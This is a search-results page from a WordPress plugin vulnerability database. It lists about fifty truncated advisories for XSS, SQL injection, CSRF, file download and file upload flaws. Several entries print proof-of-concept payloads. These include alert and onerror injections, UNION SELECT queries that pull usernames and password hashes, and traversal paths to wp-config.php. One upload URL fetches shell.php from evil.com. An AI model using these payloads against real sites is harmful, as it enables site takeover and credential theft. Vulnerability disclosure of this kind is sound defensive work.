4359 matches found
Recent Posts Widget Extended <= 0.9.9.3 - Authenticated XSS (multisite)
XSS in the Recent Posts Widget Extended plugin allows single site admins to change network admin's password with simple CSRF described above POC field. This vulnerability is currently unpatched. 1. Login as single site administrator 2. Add Recent Posts Extended Widget to some widget area 3. Add...
SEO Redirection < 2.9 - Authenticated Reflected Cross-Site Scripting (XSS)
The plugin was affected by an Authenticated Reflected Cross-Site Scripting XSS security vulnerability in its settings page, via the search GET parameter https://example.com/wp-admin/options-general.php?page=seo-redirection.php&tab=posts&search=%22+onmouseover%3Dalert%281%29+%3E...
recent-backups <= 0.7 - Remote File Download
Plugin is still affected and has been closed. The code in download-file.php does not verify if the user is logged in or sanitize which files can be downloaded. This vulnerability can be used to download sensitive system files, such as the Linux passwd file. $ curl -v...
Hide My WP <= 4.51.1 - Stored Cross-Site Scripting (XSS)
An attacker can make a fake attack attempt, with a JavaScripting payload, which will be logged by the plugin, resulting in XSS. The attacker also can spoof their IP address in the logs by setting the X-FORWARDED-FOR header. curl --referer ' // :; ;' --header 'X-FORWARDED-FOR: 8.8.8.8'...
WP-CopyProtect <= 3.0.0 - CSRF & Stored Cross-Site Scripting (XSS)
The WP-CopyProtect Protect your blog posts plugin for WordPress is vulnerable to a Persistent XSS attack on the settings screen, due to a lack of sanitation of user input, and lack of Cross-Site Request Forgery CSRF token nonce. alert1'/ document.getElementById"form".submit;...
Anti-Malware & Brute-Force Security by ELI <= 4.15.17 - Multiple Reflected XSS
The Anti-Malware Security and Brute-Force Firewall WordPress plugin was affected by a Multiple Reflected XSS security vulnerability. http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLSmsg=xsstestalert1...
Freshmail for WordPress <= 1.5.8 - Unauthenticated SQL Injection
There is a unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" formularies showed to the web visitors in the POST parameter fmformid. POST /wp-admin/admin-ajax.php HTTP/1.1 Host: X-Requested-With: XMLHttpRequest ... Cookie: wordpressf30...
Ultimate Product Catalogue <= 3.1.2 - Unauthenticated SQL Injection
Unauthenticated SQL injection in ajax call when the plugin is counting the times a product is being seen by the web visitors. The vulnerable POST parameter is "ItemID". Vulnerable code: In file Functions/ProcessAjax.php line 67: ... $ItemID = $POST'ItemID'; $Item = $wpdb-getrow"SELECT ItemViews...
WP-Mon - Arbitrary File Download
The wp-mon WordPress plugin was affected by an Arbitrary File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php...
Category Page Icons <= 0.9.1 - Arbitrary File Upload/Deletion via Path Traversal
v0.9.2 added a check to not allow direct access to the affected file. However the path traversal was not fixed Plugin has been closed from repository. Choose File to upload : Directory :...
Gallery 3.06 - Unauthenticated File Upload PHP Code Execution
The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability. The vulnerable file was: http://www.example.com/wp-content/plugins/gallery-plugin/upload/php.php...
15Zine < 3.3.0 - Reflected Cross-Site Scripting
Description The theme does not sanitise and escape the cbi parameter before outputing it back in the response via the cbsa AJAX action, leading to a Reflected Cross-Site Scripting https://example.com/wp-admin/admin-ajax.php?action=cbsa&cbi=alert/XSS/;...
Rank Math 0.9~1.0.42.1 - Missing Access Controls to Disable Competitor Plugins
Missing access controls on the GET requests to deactivate competitors' plugins. This could allow any authenticated users such as subscribers to deactivate the SEO and Sitemap plugins from competitors. The attack could also be performed via CSRF...
ThemeGrill Demo Importer < 1.6.3 - Auth Bypass & Database Wipe
There is a vulnerability that allows any unauthenticated user to wipe the entire database to its default state after which they are automatically logged in as an administrator. Edit WPScanTeam: v1.6.2 was released with an insufficient fix, allowing attackers to still exploit the issue using a CSR...
Featured Image from URL <= 2.7.7 - Missing Access Controls on REST routes
The REST routes are missing permission callbacks, allowing unauthenticated/unauthorised users to call them. Affected endpoints: - wp-json/featured-image-from-url/v2/enablefakeapi - wp-json/featured-image-from-url/v2/disablefakeapi - wp-json/featured-image-from-url/v2/nonefakeapi -...
Groundhogg <= 2.0.8.1 - Authenticated Reflected XSS
Wordpress Groundhogg plugin with a version lower than 2.0.8.1 is affected by an authenticated Reflected Cross-site scripting XSS vulnerability. Exploit Title: Wordpress Groundhogg /wp-admin/admin.php?page=ghbulkjobs&action=ghexportcontactsalert1 - The response will contain: bulkaction:...
Portrait-Archiv.com Photostore <= 3.1 - Unauthenticated Reflected XSS
The 'pDetails' GET parameter from the js/imageDetails.php was vulnerable to an unauthenticated reflected XSS attack. http://www.example.com/wp-content/plugins/portrait-archiv-shop/js/imageDetails.php?pDetails=;;alert"XSS"...
Hybrid Composer <= 1.4.6 - Unauthenticated Options Update
This plugin has a function to update Wordpress options via Ajax and it's set with the following: addaction'wpajaxnoprivhcajaxsaveoption', 'hcajaxsaveoption'; Which means it does not require authentication and is exploitable by anyone on the internet. I've already spoken to the plugin author about...
WP Slimstat <= 4.8.3 - CSRF to Stored XSS and Setting Updates
Lack of CSRF check and sanitisation in the updatesettings function can lead to settings update, as well as Stored XSS issues /wp-admin/admin.php?page=slimconfig&tab=1" method="POST" ' /...
Share This Image <= 1.19 - Stored XSS
Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered Go to the Share This Image menu, and put " in the Selector field from the "What to Share" secti...
Breadcrumb NavXT <= 6.1.0 - Username Disclosure via REST API
The Breadcrumb NavXT WordPress plugin was affected by an Username Disclosure via REST API security vulnerability. http://www.example.com/wp-json/bcn/v1/author/1...
Profile Builder < 2.5.8 - Authenticated Stored Cross-Site Scripting (XSS)
Stored Cross-Site Scripting XSS in field minimum password length. history.pushState'', '', '/'...
ByREV WP-PICShield - Cross-Site Request Forgery (CSRF)
The ByREV WP-PICShield WordPress plugin is vulnerable to CSRF. When updating the plugin options, several parameters in the issued POST request are written directly to the .htaccess file within the WordPress root directory. An attacker may be able to insert arbitrary lines into the .htaccess file,...
WP Private Messages 1.0.1 – Authenticated SQL Injection
Type user access: registered user. $GET‘id’ is not escaped. URL is accessible for every registered user. http://www.example.com/wp-admin/users.php?page=wp-private-messages%2Fwpuprivatemessages.php&wpu=read&id=0+UNION+SELECT+1,2,2,name,slug,6,7,8,9,10,11,12+FROM+wpterms+WHERE++termid%3D1&r=recieve...
Answer My Question 1.3 - SQL Injection
$POST'id' is not escaped. Url is accessible for any user. Url vulnerable : http://target/wp-content/plugins/answer-my-question/modal.php...
BBS e-Franchise 1.1.1 - Unauthenticated SQL Injection
$GET‘uid’ is not escaped, the URL is accessible for any user. You will have find a post or page that uses the plugin's shortcode...
FireStorm Shopping Cart eCommerce Plugin 2.07.02 - Authenticated SQL Injection
$POST ‘pid’ is not escaped. Url is accessible for administrator user. Url with problem: http://localhost:1406/wp/wp-admin/admin.php?page=fssc-products=general=edit=0=0 http://target/wp-admin/admin.php?page=fssc-products&fp=general&f=edit&cid=0&pid=0+UNION+SELECT+name+FROM+wpterms+WHERE+termid=1...
Appointment Calendar - Stored Cross-Site Scripting (XSS)
When user submist data from appointments there is no validation which leads to stored XSS. curl 'Path to page where appointments calendar short-code is used' -H 'Accept: text/html, /; q=0.01' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Content-Type:...
Real3D FlipBook <= 2.8 - Multiple Vulnerabilities
List of vulnerabilities: - Delete any file or directory from the server Unauthenticated - Upload images in Root directory Unauthenticated - Cross-Site Scripting XSS + POCExploit CodeCanyon Real3D FlipBook WordPress Plugin + http://codecanyon.net/item/real3d-flipbook-wordpress-plugin/6942587 +...
CM Ad Changer <= 1.7.7 - Stored Cross-Site Scripting (XSS)
An Stored Cross Site Scripting was reported by the author to CM Ad Plugins under which an unprivileged user can trigger a Stored XSS to perform malicious actions or any attacker could send a crafted link CSRF which can trigger the Stored XSS. 1 Go to CM Ad changers - Campaigns 2 Create a Campaign...
The Events Calendar <= 4.1.1 - Open Redirect
The problem is located in the "tribe-bar-view" parameter that can be used to redirect a user to an arbitrary website. Timeline 2016-04-04 : Initial contact with Modern Tribe 2016-04-05 : Modern Tribe confirms the report 2016-04-07 : Modern Tribe publishes a new version 4.1.1.1 that resolves the...
WP Google Map Plugin < 3.0.0 - CSRF to Authenticated Cross-Site Scripting (XSS)
The lack of CSRF Protection could allow attackers to perform XSS attack against logged in administrators. ' / ' /...
Download Manager <= 2.7.94 - Authenticated Stored XSS
The stored XSS vulnerability allows any authenticated user to inject malicious code via the name of the uploaded file: Example: .jpg The vulnerability exists because the file name is not properly sanitized and this can lead to malicious code injection that will be executed on the target’s browser...
Users to CSV <= 1.4.5 - Cross-Site Request Forgery (CSRF)
The users-to-csv WordPress plugin was affected by a Cross-Site Request Forgery CSRF security vulnerability. http://www.example.com/wp-admin/users.php?page=users2csv.php&csv=true&table=users http://www.example.com/wp-admin/users.php?page=users2csv.php&csv=true&table=comments...
WordPress 3.5-3.7.1 - XML-RPC Denial of Service
…...
KenBurner Slider - Unauthenticated Arbitrary File Download
The WordPress Plugin called KenBurner Slider suffers from Arbitrary File Download Vulnerability, which could allow an attacker to download the wp-config.php file and others. This issue has been spotted being exploited in the wild...
BSK PDF Manager < 2.9.1 - Authenticated Stored Cross-Site Scripting (XSS)
The plugin does not sanitise the view and cattitle POST parameter when creating or editing a category /wp-admin/admin.php?page=bsk-pdf-manager, allowing authenticated users with a role as low as editor to set an XSS payload which will be triggered in the Categories list...
Findgo - Directory Listing < 1.3.32 - Unauthenticated Reflected and Authenticated Stored XSS
Multiple Cross-Site Scripting XSS vulnerabilities were discovered in the «Findgo - Directory Listing WordPress Theme», tested version — v1.3.30. PoC Unauthenticated Reflected XSS: https://demoapus.com/findgo/listings/?searchdistance=%22%3E%3Cimg%20src=x%20onerror=alertXSS%3E PoC Authenticated...
Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export
The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to get information about the posts and page of the blog, including their author's username and email. The plugin is still affected and has been closed. curl...
Rencontre < 3.2 - Authenticated Stored XSS via textmail & textanniv Parameters
An authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in the victim's browser when they visit the web site. Affected Version Version: alert'XSS'// Encoded-Payload:...
Watu Quizz <= 3.1.2.5 - Reflected XSS via question-form.html.php
The Watu Quiz WordPress plugin was affected by a Reflected XSS via question-form.html.php security vulnerability. /wp-admin/admin.php?page=watuquestion&question=1&action=edit&quiz=1"...
Like Button Rating < 2.5.4 - Unauthenticated Arbitrary Blog Settings Change
In the init action, this plugin checked to see if $POST'likebtnimportconfig' is empty. If it’s not empty then it base64-decodes the string, parses it as JSON, and starts changing options. This could allow attackers to change blog settings such as the Site Title. The below form will set the “Site...
DSubscribers <= 1.2 - Authenticated SQL Injection
The DSubscribers WordPress plugin was affected by an Authenticated SQL Injection security vulnerability. Proof of Concept: 1 – Login with admin user: 2 – Url attack: http://target/wp-admin/admin.php?page=dsubscribers&action=edit&dsubscribers=0 UNION SELECT 1,2,CONCATuserlogin,char58,userpass FROM...
Tribulant Newsletters <= 4.6.4.2 – Multiple Vulnerabilities
The Newsletters WordPress plugin was affected by security vulnerability. 3.1 File disclosure Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=newslettershistory&wpmlmethod=exportdownload&file=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWIN DOWS%5cwin.ini 3.2 Cross-Site...
Calendar by WD <= 1.5.51 - Authenticated SQL injection
http://www.defensecode.com/advisories/DC-2017-01-017WordPressSpiderEventCalendarPluginAdvisory.pdf Vulnerable POST URL: http://www.vulnerablesite.com/wpadmin/admin.php?page=SpiderCalendar&task=showmanageevent&calendarid=1 Vulnerable POST Body:...
WordPress Facebook <= 1.0.13 - Authenticated SQL Injection
http://www.defensecode.com/advisories/DC-2017-04-011WordPressFacebookPluginAdvisory.pdf Vulnerable POST URL: http://vulnerablesite.com/wp-admin/admin.php?page=SpiderFacebookmanage Vulnerable POST Body: searcheventsbytitle=&pagenumber=1&serchornot=&ascordesc=1&orderby=type AND SELECT FROM...
W3 Total Cache <= 0.9.4.1 - Authenticated Reflected Cross-Site Scripting (XSS)
The W3 Total Cache WordPress plugin was affected by an Authenticated Reflected Cross-Site Scripting XSS security vulnerability...
WP Mobile Detector <= 3.5 - Arbitrary File Upload
The wp-mobile-detector WordPress plugin was affected by an Arbitrary File Upload security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-mobile-detector/resize.php?src=https://www.evil.com/shell.php...
Anti-Malware Security & Brute-Force Firewall <= 4.15.42 - XSS & CSRF
The Anti-Malware Security and Brute-Force Firewall WordPress plugin was affected by a XSS & CSRF security vulnerability. XSS vulnerability in https://wordpress.org/plugins/gotmls/ has been identified. While I scan a site with that plugin , i had a file '".png and it was skippped , but result was...
Commentator <= 2.5.2 - Reflected Cross-Site Scripting (XSS)
The commentator WordPress plugin was affected by a Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-admin/admin-ajax.php?action=commentatorsocialsignin&provider=facebook"...